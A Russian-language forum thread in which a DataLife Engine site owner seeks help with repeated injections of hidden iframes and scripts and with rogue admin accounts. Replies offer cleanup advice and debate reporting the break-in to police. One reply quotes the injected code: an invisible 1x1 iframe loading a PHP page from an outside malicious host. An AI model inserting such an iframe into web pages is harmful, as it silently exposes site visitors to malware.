Перейти к публикации

Вирусы очередной раз атакуют сайт


Рекомендованные сообщения

Наверное, стоит начать с начала.

Несколько лет назад создал сайт на Nulled-движке DLE, тогда ещё и не знал, что это такое, просто посоветовали. Меньше года назад купил лицензию. Но до этого были проблемы с вирусами. iframe они постоянно добавляли. Вобщем, сменил на лицензию и антивирусом нашёл вроде-бы всё, почистил, сменил все явки и пароли (к почте, к БД, к хостингу) и больше полугода всё было нормально. С месяц назад начали появляться Новые админы на сайте, я, естественно, удалял их. Была версия 8.5. Вот сегодня опять вирусы обложили. iframe добавляет в начало сайта (в шаблонах не найти) и в некоторых новостях пользователей в конце яваскрипты докидывает. До этого находил расположение вредоносного кода с помощью Netbeans, но в этот раз не могу найти им ничего, просто мистика какая-то. Антивирус тоже ничего не нашёл. Обновил движок до версии 9.2 но не помогло. ВОт сейчас отключил сайт и пытаюсь разобраться. Но не выходит :( что делать? сайт 1000designs.ru

Ссылка на сообщение
Поделиться на других сайтах

Нужно чистить базу данных. :rolleyes:

Ссылка на сообщение
Поделиться на других сайтах

Каким образом? что чистить? что искать? какие параметры? можно развёрнутый ответ?

Ссылка на сообщение
Поделиться на других сайтах

Более подробно..

Сайт заражен:

<iframe src='http://gutten-tag-tag.co.cc/f/jldtjuc.php?n=40941' width='1' height='1' frameborder='0'></iframe>

и т.д.

Если у вас еще с версии 8.5 вирусы лезут, значит в свое время не стояли патчи безопасности и теперь, скорее всего, этот код уже в БД. А если после обновления на 9.2 было все нормально, а потом стали появляться, то где-то дыра есть... phpMyAdmin - какая версия? Там тоже были дыры.

Посмотрите dbconfig.php, не дописано ли там что...

Попробуйте использовать перестроение новостей в админке:

этот раздел перестраивает новости в соответствии с настройками скрипта и требованиями безопасности скрипта. JS код добавить в новость через скрипт нельзя, это запрещено, поэтому при перестроении новостей, скрипт автоматически его зачищает.
Изменено пользователем ower_xz
Ссылка на сообщение
Поделиться на других сайтах

Я бы вообще начал с нуля....снес бы все к черту включая и смену хостера на зло тем кто занимается взломом.

Вот мне интересно, ведь не все взломщики используют vpn и прочее, зная ip реально предъявить что либо? Имею ввиду вычислить вплоть до суда дойти. Или это не реально будет доказать вину?

Кстати на сайт вообще не пускает

Внимание! Посещение этого сайта может нанести вред вашему компьютеру.
Изменено пользователем Azat868
Ссылка на сообщение
Поделиться на других сайтах

morgannZ, пишите мне в ICQ. Помогу почистить БД ;)

Ссылка на сообщение
Поделиться на других сайтах

такая же проблема... причем поиск кода по файлам на сервере и поиск по бд ничего не находит... бекап помогает на некоторое время, но через несколько часов снова сайты заражаются, смена паролей никак не помогает (

Ссылка на сообщение
Поделиться на других сайтах

TCT, пишите мне в ICQ, помогу решить Вашу проблему ;)

Ссылка на сообщение
Поделиться на других сайтах

Вот мне интересно, ведь не все взломщики используют vpn и прочее, зная ip реально предъявить что либо? Имею ввиду вычислить вплоть до суда дойти. Или это не реально будет доказать вину?

Конечно, вам не нужно выискивать чей либо IP, и прочее, это уголовно наказуемое деяние, просто идете и пишите заявление в милицию. Возбуждается уголовоное дело, отдел K сам изымит все логи сервера, опеределит IP, и даже если он был за прокси и прочим, реальный IP все равно определяется по датам и времени обращений к прокси, для этого делаются запросы провайдерам. Все это делаете не вы, а отдел K, вероятность того что его найдут, очень высока, более того, это уголовное преступление, он будет осужден по уголовной статье, а не вы в суд подаете и прочее. Вы только пишите заявление в милицию и все.

Ссылка на сообщение
Поделиться на других сайтах

TCT, пишите мне в ICQ, помогу решить Вашу проблему ;)

Ты не устал каждому объяснять? ))))

Уже бы инструкцию написал и здесь выложил.

Ссылка на сообщение
Поделиться на других сайтах

Вы только пишите заявление в милицию и все.

Azat868, вероятнее всего милиция откажется от такого. Тогда просите у милиции отказ в письменной форме :rolleyes:

Ссылка на сообщение
Поделиться на других сайтах

Вот мне интересно, ведь не все взломщики используют vpn и прочее, зная ip реально предъявить что либо? Имею ввиду вычислить вплоть до суда дойти. Или это не реально будет доказать вину?

Конечно, вам не нужно выискивать чей либо IP, и прочее, это уголовно наказуемое деяние, просто идете и пишите заявление в милицию. Возбуждается уголовоное дело, отдел K сам изымит все логи сервера, опеределит IP, и даже если он был за прокси и прочим, реальный IP все равно определяется по датам и времени обращений к прокси, для этого делаются запросы провайдерам. Все это делаете не вы, а отдел K, вероятность того что его найдут, очень высока, более того, это уголовное преступление, он будет осужден по уголовной статье, а не вы в суд подаете и прочее. Вы только пишите заявление в милицию и все.

Я смеюсь! А что... я всегда смеюсь когда мне смешно... :lol:

Это в странах бывших совков (ныне СНГ, не знаю о какой конкретно из них идёт речь) будут искать злостного террорюгу взломавшего какой-то там вшивый сайтик, которого и в поисковиках то нету? Вы это серьёзно сказали или так... поиздеваться над вопросящим? :lol:

Ссылка на сообщение
Поделиться на других сайтах

Вот мне интересно, ведь не все взломщики используют vpn и прочее, зная ip реально предъявить что либо? Имею ввиду вычислить вплоть до суда дойти. Или это не реально будет доказать вину?

Конечно, вам не нужно выискивать чей либо IP, и прочее, это уголовно наказуемое деяние, просто идете и пишите заявление в милицию. Возбуждается уголовоное дело, отдел K сам изымит все логи сервера, опеределит IP, и даже если он был за прокси и прочим, реальный IP все равно определяется по датам и времени обращений к прокси, для этого делаются запросы провайдерам. Все это делаете не вы, а отдел K, вероятность того что его найдут, очень высока, более того, это уголовное преступление, он будет осужден по уголовной статье, а не вы в суд подаете и прочее. Вы только пишите заявление в милицию и все.

Я смеюсь! А что... я всегда смеюсь когда мне смешно... :lol:

Это в странах бывших совков (ныне СНГ, не знаю о какой конкретно из них идёт речь) будут искать злостного террорюгу взломавшего какой-то там вшивый сайтик, которого и в поисковиках то нету? Вы это серьёзно сказали или так... поиздеваться над вопросящим? :lol:

Ну он работал в милиции и видимо описал порядок действий. А будут искать или нет, это другой вопрос. Покрайне мере должны взять заявление я так думаю :) , но при этом нужно надеется что пострадавший сайт сам не противоречит содержанием, дружит с налоговой(если это магазин какойто) и домен записан на вас, а то какбы не пришлось из пострадавших, преворатится в обвиняемых)))

Ссылка на сообщение
Поделиться на других сайтах

и домен записан на вас, а то какбы не пришлось из пострадавших, преворатится в обвиняемых)))

Полностью согласен, если имеется нелегальный контент и какая-либо реклама смысла не будет идти писать заяву. Да и не верится что местные будут отправлять отделу К такие заявы, забьют наверное ;)

Ссылка на сообщение
Поделиться на других сайтах

Вот мне интересно, ведь не все взломщики используют vpn и прочее, зная ip реально предъявить что либо? Имею ввиду вычислить вплоть до суда дойти. Или это не реально будет доказать вину?

Конечно, вам не нужно выискивать чей либо IP, и прочее, это уголовно наказуемое деяние, просто идете и пишите заявление в милицию. Возбуждается уголовоное дело, отдел K сам изымит все логи сервера, опеределит IP, и даже если он был за прокси и прочим, реальный IP все равно определяется по датам и времени обращений к прокси, для этого делаются запросы провайдерам. Все это делаете не вы, а отдел K, вероятность того что его найдут, очень высока, более того, это уголовное преступление, он будет осужден по уголовной статье, а не вы в суд подаете и прочее. Вы только пишите заявление в милицию и все.

Я смеюсь! А что... я всегда смеюсь когда мне смешно... :lol:

Это в странах бывших совков (ныне СНГ, не знаю о какой конкретно из них идёт речь) будут искать злостного террорюгу взломавшего какой-то там вшивый сайтик, которого и в поисковиках то нету? Вы это серьёзно сказали или так... поиздеваться над вопросящим? :lol:

Ну он работал в милиции и видимо описал порядок действий. А будут искать или нет, это другой вопрос. Покрайне мере должны взять заявление я так думаю :) , но при этом нужно надеется что пострадавший сайт сам не противоречит содержанием, дружит с налоговой(если это магазин какойто) и домен записан на вас, а то какбы не пришлось из пострадавших, преворатится в обвиняемых)))

Какая милиция будет в наших странах что то делать? Тем более изворачиваться по пустякам.. Понимаю бы мега еротический проект - где можно "принявши" админа - заработать бабла - что бы дело не открывать. Пишите в милиции посмеются...

По поводу темы вопроса. Создайте с нуля БД. И будет вам счастье. Мало ли вы там сейчас тянете с собою всю дорогу...

Ссылка на сообщение
Поделиться на других сайтах

Пишите в милиции посмеются...

Зря Вы так думаете. Уже давно не смеются, во всяком случае на Украине, а реально ищут и находят ;)

Ссылка на сообщение
Поделиться на других сайтах

мне тоже 2 раза ломали, но почистив базу, сменив пароли, поставив заплатки, удалив "юзера" (взломщика) - пока все хорошо. Правда под новым паролем не вхожу в админпанель. Работаю через денвер - делаю базу, китаю ее через SSH на сервер, распаковываю - опять меняю пароль и т.д.Правда неделю на сайте сидел какой-то робот-взломщик - долбил одним и тем же запросом сайт - трафик увеличился беспричинно в 4 раза. Думаю, искали дыры. Но сейчас упал до нормального. Пока работаю.

По поводу phpMyAdmin у моего хостера стоит 2-ка. попробовала его развести на 3-ку. Сказал, что взлом через сервер исключен поэтому у всех 2-ка и ни одного взлома через phpMyAdmin 2 не было ни у кого. Хостер Агава.

Ссылка на сообщение
Поделиться на других сайтах

Я вообще никогда не понимал такие темы... Это всё ровно что делать переливание крови и донором будет больной ВИЧ, а потом сидеть и думать как же мне вылечить СПИД... (это я так, для наглядности примера) Не пользуйтесь подделкой и голова болеть не будет! Но нет, все хотят шару! А Бесплатный сыр, только в мышеловке...

Это напоминает мне анекдот из 90х:

Сын пятикласник подходит к отцу, новому русскому, и спрашивае:

- Пап, как найти обьём шара?

- Шара, сынок, обьёма не имеет!

Так и тут, шара обьёма не имеет и гемморой с этой шарой обьёма не имеет... :huh:

ЗЫ сайт кстате понравился! Всмысле тематика и содержание. Зафейворитил бы если-бы на сайте вирусов небыло...

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...